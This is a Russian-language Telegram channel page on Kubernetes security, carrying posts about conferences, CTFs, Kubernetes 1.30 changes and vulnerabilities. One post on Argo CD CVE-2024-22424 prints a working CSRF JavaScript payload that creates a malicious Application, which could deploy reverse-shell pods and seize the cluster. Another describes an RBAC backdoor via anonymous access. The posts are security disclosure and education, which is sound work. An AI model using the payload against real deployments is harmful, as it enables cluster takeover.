k8s (in)security
12.1K subscribers
1.01K photos
38 files
1.56K links
Канал о (не)безопасности Kubernetes + микросервисных, контейнеризированных приложений.

Ведет команда www.luntry.ru

Вопросы, идеи, предложения => @Qu3b3c

https://knd.gov.ru/license?id=673ddbc21039886b1d03b7ce&registryType=bloggersPermission
Download Telegram
Это выписка с предупреждением из официальной документации Docker, говорящая о проблемах работы системы контейнеризации на одном хосте с антивирусным решением.

Относительно Kubernetes все абсолютно тоже самое. Как вы знаете containerd, runc это части проекта Docker, а в инсталляциях с cri-o под капотом чаще всего тот же runc. Так что относительно заметки меняется только путь на файловой системе и все.

Я должен был добавить это в соответствующий раздел своей презентации "Безопасность Kubernetes кластеров: вредные советы" на DevOpsConf 2024, но забыл и сейчас вот исправляюсь.

P.S. Обратите внимание, что это актуально и для Linux и для Windows.
👍195🔥1
Тут недавно узнал, что в этом году исполняется 25 лет журналу "Хакер"! С этой грандиозной датой и хочется его поздравить)

Я уже как-то писал [1,2], что на протяжении 7 лет c 2010 по 2016 был редактором рубрик "X-Toolz" и "Security soft" (в разные годы, помимо статей) в журнале когда он был еще бумажным. Так что для меня это совсем не чужой журнал.
👍1915🎉12🔥5🤔1
Исследователи из WIZ сделали небольшой онлайн CTF "Kubernetes LAN Party" на тему Kubernetes Security. Он довольно обширно и нетривиально покрывает вопросы сетевой безопасности в Кубере. Разведка в скомпропетированном Pod, обход Istio и Lateral Movement с помощью Kyverno – всё это есть в этом CTF. Ничего дополнительно устанавливать не требуется, терминал доступен прямо из браузера.

Сами мы уже прошли челлендж, и однозначно рекомендуем пройти его всем, кто так или иначе имеет дело с безопасностью контейнеров и Kubernetes.

P.S – Хотите увидеть прохождение данного CTF от нас?
👍554🥰1
На нашем сайте стали доступны слайды и видео с вебинара/стрима "Runtime Security: на вкус и цвет все фломастеры разные". Это почти 2-х часовое погружение в мир агентских средств безопасности! Результатам данного анализа стала вот такая совсем не маленькая сравнительная таблица.
🔥30👍81
Стало доступно видео доклада Orchestrate This! Kubernetes Rootkit с прошедшей конференции Blackhat Europe 2023. О самой начинке доклада мы рассказывали в одном из предыдущих постов. Хотим лишь напомнить, что авторы в своем докладе представили container-based rootkit под названием kubekit.

В видео авторы демонстрируют демо, в котором показывают возможности представленного инструмента.
👍7🔥62
Вчера в одном из чатов тренинга нас спросили наше мнение насчет следующего момента из документации kubespray:"The anonymous-auth (on kube-apiserver) is set to true by default. This is fine, because it is considered safe if you enable RBAC for the authorization-mode."

Что явно противоречит пункту 1.2.1 из CIS Kubernetes Benchmark 1.8, который гласит: "Ensure that the --anonymous-auth argument is set to false" (по умолчанию значение true). Но там же в разделе написано: "If you are using RBAC authorization, it is generally considered reasonable to allow anonymous access to the API Server for health checks and discovery purposes, and hence this recommendation is not scored. However, you should consider whether anonymous discovery is an acceptable risk for your purposes." Что по сути уже повторяет смысл из документации kubespray.

Помните:
1. У пользователя system:anonymous и группы system:unauthenticated (от которых идут такие запросы) тоже есть права.
2. Включенный RBAC (если он включен, иначе туши свет) будет по этим правам давать им доступ.
3. Атакующий может накинуть права в RBAC для данного пользователя и группы, и он сможет пользоваться этими правами без аутентификации (считай backdoor). Если у вас разрешен анонимный доступ, контролируйте, что нет дополнительных прав.

По этой теме будет полезно вспомнить также статью "Let's talk about anonymous access to Kubernetes".
👍20🔥101👏1
Сегодня мы рады анонсировать еще 1 доклада с нашей конференции БеКон 2024. Таким образом уже анонсировали 7 докладов. Будет еще 2-3.

#7

Название: Латаем огрехи в образах приложений с помощью Kubernetes
Докладчик: Анатолий Карпенко, Luntry
Описание: Обычная ситуация — вам достался образ, который вот совсем не по best practice по безопасности. И вы отказаться от него не можете и поправить в нем ничего не можете. Или все-таки можете?! C помощью механизмов Kubernetes?! В рамках этого доклада как раз с этим и разберемся.
🔥151❤‍🔥1
На прошлой неделе завершилось ежегодное сореванование хакеров Pwn2Own, которое в этот раз проходило с расширенным скоупом – в список таргетов попали Docker Desktop, containerd, Firecracker и gRPC. Первый побег из контейнера в Docker Desktop через UAF в рамках этого сореванования продемонстрировала команда STAR Labs SG и заработала $60,000.

По правилам, у вендора есть 90 дней перед тем, как исследователи раскроют технические подробности и задействованные эксплойты. А пока остаётся только гадать, через какой вектор исследователям удалось сбежать из контейнера – была ли это ядерная бага или же проблема в одном из компонентов Docker.
👍15🔥51🥰1
Вчера данному каналу, который вы сейчас читаете, исполнилось 4 года! Спасибо что читаете, комментируете, ставите реакции и просто не равнодушны к нашей деятельности. Будем и дальше вас радовать интересными постами, докладами, эфирами, конференциями по теме безопасности контейнеров и Kubernetes! У нашей команды Luntry есть еще много идей как можно сделать вовлечение и изучение данной сферы более интересным и полезным – главное, чтобы на все это хватило времени и сил)

Если вы нас хотите поддержать в этом деле, то расскажите о канале тем, кому это будет полезно. Будет здорово если наша сообщество будет расти,развиваться и мы видеть эту обратную связь!

P.S. А моему сынишке 3 года! Да-да и все это в один день)
🔥42🥰13🎉137❤‍🔥5🍾5👍4👏2💩21
Наши хорошие товарищи Антон Жаболенко и Алексей Федулаев в рамках HighLoad++ 2023 выступали с любопытным докладом под названием "Как собрать контейнер и не вооружить хакера". И сейчас стала доступна видеозапись выступления и статья на Хабре по мотивам доклада.

Данная презентация посвящена Living off the Land (LotL) атакам. По сути, это атаки с использованием легитимных программ, которые уже присутствуют в целевой системе куда попал атакующий. В данном случае это в образах контейнеров. В статье есть множество разных трюков/приемов о которых должен знать любой представитель красной команды) Ну а оппоненты из синей команды должны знать способы как это либо предотвратить, либо своевременно обнаружить ;)
👍23🔥1253💩3🥰1
На прошлой неделе прошел KubeCon + CloudNativeCon Europe 2024, однако перед этой большой конференцией прошла Cloud Native Rejekts EU 24 – по масштабам она сильно меньше, но по полезности точно не уступает. Эта конференция для докладов, которые не были приняты на KubeCon + CloudNativeCon Europe 2024.

Один из докладов оттуда – Exploring Attacker Persistence Strategies in Kubernetes от Rory McCune, в нём он рассказывает о способах закрепления в Kubernetes кластерах.

По сценарию, который рассматривается в докладе, атакующий получает доступ к cluster-admin на короткий промежуток времени и хочет закрепиться в кластере, используя Tailscale. Более подробно о том, что это такое и как с этим работать он рассказал в статье Using Tailscale for persistence.
🔥7👍31🥰1
С 19 по 22 марта в Париже прошел KubeCon + CloudNativeCon Europe 2024. Там было как всегда море всего интересного про Kubernetes и его безопасность. Пока что мы еще изучаем показанное там и готовим для вас посты, вы уже можете самостоятельно окунуться в море почти бесконечных докладов! Но предварительно ознакомьтесь с их перечнем в расписании, чтобы сориентироваться где и что искать ;)

- KubeCon + CloudNativeCon Europe 2024
- ArgoCon North Europe 2024
- BackstageCon Europe 2024
- Cloud Native AI Day Europe 2024
- Cloud Native Wasm Day Europe 2024
- Kubeflow Summit Europe 2024
- Multi-TenancyCon Europe 2024
- OpenTofu Day Europe 2024
- Platform Engineering Day Europe 2024

Напомним, что теперь SecurityDay трека нет, а есть отдельная конференция CloudNativeSecurityCon и она будет 26–27 июня.
🔥11👍10🥰1
Kubernetes 1.30 уже не за горами (релиз 17 апреля), кодовая база заморожена, а это значит что самое время посмотреть, что нового приготовили для нас разработчики со стороны security.

- Improved Handling of Secret Images in Container Runtime. Повторная аутентификация при связке imagePullPolicy: IfNotPresent и imagePullSecrets
- Reduction of Secret-Based Service Account Tokens. При создании нового Service Account, токен и его секрет не будут генерироваться автоматически
- Bound Service Account Token Improvements. Теперь к Service Account, которые привязаны к конкретным Pod будут добавляться JWT ID (JTI).
- Node Log Query. Добавление новой ручки в kubelet, благодаря которой можно будет собирать логи с Nodekubectl get --raw "/api/v1/nodes/worker/proxy/logs/?query=kubelet&pattern=error"
- Prevent Unauthorized Volume Mode Conversion During Volume Restore. Предотвращение несанкционированного доступа, когда PVC восстанавливается из VolumeSnapshot.
- Speed Up Recursive SELinux Label Change. Ускорение времени запуска контейнеров за счет оптимизации процесса изменения лейблов SELinux.
- Kubelet Support for Image Filesystem Split. Разделение FS контейнера на слои – writable и read-only.

Про эти и другие изменения более подробно можно почитать в официальном changelog.
🔥19👏4🥰2
Сегодня мы рады анонсировать еще 1 доклад с нашей конференции БеКон 2024. Таким образом уже анонсировали 8 докладов. Будет еще 1-2.

#8

Название: Вы еще не читаете Kubernetes Audit Log? Тогда мы идем к вам!
Докладчик: Алиса Кириченко (Лаборатория Числитель)
Описание: Многие компании, в т.ч. крупные сталкиваются с проблемой эффективного сбора и обработки логов. В докладе мы рассмотрим: для чего собирать Kubernetes логи, как их выбирать, не терять при сборе и перенаправлении, а также не перегружать хранилище

Напомним, что билетов ограниченное количество, и взять их можно тут.
❤‍🔥9👍42🥰1
В связи с недавним нашумевшем инцидентом с xz utils в очередной раз хочется обратить внимание на замечательную заметку от Halvar Flake под названием "A bank statement for app activity (and thus personal data)" от 2018 года, где он рассуждает что такое вредоносное и не вредоносное.

Пускай он там говорит в основном про мобильные приложения, но суть поведения приложений также накладывается и на контейнеры с их запуском исполняемых файлов, обращению к файловой системе и сетевым соединениям. Также благо, что наши контейнеры запускаются на иммутабельных образах и имеют не изменяемую логику, небольшую работу на скейле (на нескольких копиях).

Как итог, важно понимать свою систему, которую вы защищаете, а не относиться к ней как к черному ящику.

P.S. Занимательный факт - именно эта заметка легла в основу поведенческого анализа и observability нашего Luntry.
👍25
4 апреля в Москве в рамках мероприятия «Территория безопасности 2024: все pro ИБ» наша команда и в рамках выставки покажет Luntry, и в рамках секции PRO УПРАВЛЕНИЕ УЯЗВИМОСТЯМИ расскажет доклад «Управление уязвимостями в микросервисах и контейнерных средах».

В данном докладе мы рассмотрим какие есть особенность в теме vulnerability management для: микросервисов, контейнеров, окружений под управлением Kubernetes, облачных сред и т.д. И какие это дает возможности с соответствующими преимуществами и недостатками.

Будем рады пообщаться лично)
🔥12❤‍🔥2👍1🥰1
2024-ый год для Argo CD начался с пачки CVE (большинство из них DoS), однако наше внимание привлекла CVE-2024-22424: Cross-Site Request Forgery (CSRF) in github.com/argoproj/argo-cd.

Всё началось с того, что уже несколько лет API Argo CD уязвимо к CSRF (1,2). Но разработчики игнорировали эту проблему (видимо не было достоверных пруфов эксплуатации) и в качестве мер митигации стали использовать Lax SameSite cookie, которую можно довольно легко обойти, если origin находится в том же родительском домене, что и target.

Исследователи обнаружившие эту уязвимость рассмотрели случай, когда атакующий контроллирует содержимое на marketing.victim.com (например, через хранимую XSS) и его целью является Argo CD расположенный на argocd.internal.victim.com. Представленный PoC позволяет атакующему через CSRF уязвимость получить полный контроль над кластером Kubernetes. Для этого на подконтрольном домене атакующему достаточно разместить следующий JavaScript код:


var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://argocd.internal.victim.com/api/v1/applications');
xhr.setRequestHeader('Content-Type', 'text/plain')
xhr.withCredentials = true;
xhr.send('{"apiVersion":"argoproj.io/v1alpha1","kind":"Application","metadata":{"name":"test-app1"},"spec":{"destination":{"name":"","namespace":"default","server":"https://kubernetes.default.svc"},"source":{"path":"argotest1","repoURL":"https://github.com/user/repo","targetRevision":"HEAD"},"sources":[],"project":"default","syncPolicy":{"automated":{"prune":false,"selfHeal":false}}}}')


После того как жертва перейдет на marketing.victim.com от её лица выполнится POST запрос к API Argo CD на создание Application, где repoURLgithub репозиторий, в котором злоумышленник может разместить что угодно: Bad Pods с reverse shell, Cluster Admin права и т.д. Всё это задеплоится в кластере.

Более подробно об этой уязвимости можно прочитать в заметке исследователей.

Прикольно, что через веб уязвимость можно получить полный контроль над кластером Kubernetes.
🔥24😱9👍63🥰2
На злобу дня)

Что сейчас многие делают? Выискивают у себя в инфраструктуре этот xz utils, ставят задачи на откатиться на нужную версию и ждут когда это произойдет. Возможно кто-то еще какие-то правила детектов на уровни сети напишет. Совсем малое количество (с высоким уровнем зрелости) полезут в логи и будут пытаться там найти следы эксплуатации этой проблемы и если что заведут соответствующие инциденты, которые нужно будет расследовать. Большинство же не сможет не обнаружить этого, не провести расследования (и будут уже жить с другим бэкдором на другом уровне у себя в инфраструктуре).

Хотелось бы в очередной раз напомнить про экономический момент в безопасности. Предотвратить дешевле, чем расследовать ... Не забывайте об этом когда строите безопасность у себя в компании.
20🤡3💯1🤣1
Стало доступно видео доклада "Безопасность Kubernetes кластеров: вредные советы" с DevOpsConf 2024! Буду рад обратной связи кто не был на самом выступлении. Присутствующие же очень высоко оценили доклад - по итогам конференции он вошел в ТОП-10 =)
👍21🔥15💯3
В одном из предыдущих постов мы рассказывали про Kubernetes LAN Party – небольшое CTF, состоящее из 5 заданий и посвященное Kubernetes Network Security. Пост набрал большие охваты и реакции, очевидно, что вы хотели видеть разбор этих заданий от нас и мы его сделали.

По ссылке можно почитать write-up с разбором всех пяти заданий. Спойлеров не будет, все флаги заблюрены :) Мы рекомендуем прорешать и попробовать свои силы в этом CTF каждому, кто так или иначе имеет дело с безопасностью Kubernetes, и только потом обращаться к нашей статье.
👍31🔥103👨‍💻1
В заключении недели мы рады поделиться слайдами и видео нашего выступления "Нестандартное применение Kyverno" c конференции SafeCode 2024! Изначально доклад задумывался как полу шуточный, но с прицелом на то что бы показать практическую безграничность логику политик, которую вы можете реализовать с данным PolicyEngine. На самом деле вы ограничены лишь своей фантазией) На сегодняшней день PolicyEngine это просто must have инструмент для любой инфраструктуры и что важно как для ИБ, так и ИТ команд.
👍9🔥61🥰1